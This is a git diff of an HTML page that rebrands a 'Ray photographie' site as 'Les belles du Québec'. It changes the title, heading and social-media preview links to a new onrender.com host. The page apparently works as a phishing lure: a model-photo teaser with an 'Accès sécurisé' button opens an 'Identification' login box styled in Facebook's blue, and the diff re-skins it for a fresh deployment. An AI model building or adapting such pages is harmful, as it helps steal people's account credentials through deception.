--- a/index.html
+++ b/index.html
@@ -3,26 +3,26 @@
 <head>
   <meta charset="utf-8"/>
   <meta name="viewport" content="width=device-width, initial-scale=1"/>
-  <title>Ray photographie - Connexion sécurisée</title>
+  <title>Les belles du Québec</title>
 
   
   <!-- Open Graph / Social preview metadata (added without changing page behavior) -->
   <meta property="og:type" content="website" />
-  <meta property="og:url" content="https://rayray-photographe-msyk.onrender.com" />
+  <meta property="og:url" content="https://les-belles-du-quebec-bmdh.onrender.com/" />
   <meta property="og:title" content="Page Photos-Modèle" />
   <meta property="og:description" content="Photographies portrait & modèles" />
-  <meta property="og:image" content="https://rayray-photographe-msyk.onrender.com/preview.png" />
+  <meta property="og:image" content="https://les-belles-du-quebec-bmdh.onrender.com/preview3.png" />
   <meta property="og:image:width" content="1200" />
   <meta property="og:image:height" content="630" />
 
   <!-- Twitter Card -->
   <meta name="twitter:card" content="summary_large_image" />
-  <meta name="twitter:title" content="Page photos" />
+  <meta name="twitter:title" content="Page Photos-Modèle" />
   <meta name="twitter:description" content="Photographies portrait & modèles" />
-  <meta name="twitter:image" content="https://rayray-photographe-msyk.onrender.com/preview.png" /
+  <meta name="twitter:image" content="https://les-belles-du-quebec-bmdh.onrender.com/preview3.png" />
 
   <!-- Legacy image hint -->
-  <link rel="image_src" href="https://rayray-photographe-msyk.onrender.com/preview.png" />
+  <link rel="image_src" href="https://les-belles-du-quebec-bmdh.onrender.com/preview3.png" />
 
 
   <style>
@@ -78,7 +78,7 @@
 </head>
 
 <body>
-  <h1>Ray photographie</h1>
+  <h1>Les belles du Québec</h1>
 
   <button class="btn" id="openLogin">Accès sécurisé</button>
 
@@ -87,7 +87,7 @@
 
       <h2 style="text-align:center;color:#1877f2; display:flex; flex-direction:column; align-items:center; gap:10px;">
         <img src="logo.png" 
-             alt="logo" 
+             alt="Logo" 
              style="width:48px; height:48px;">
         Identification
       </h2>
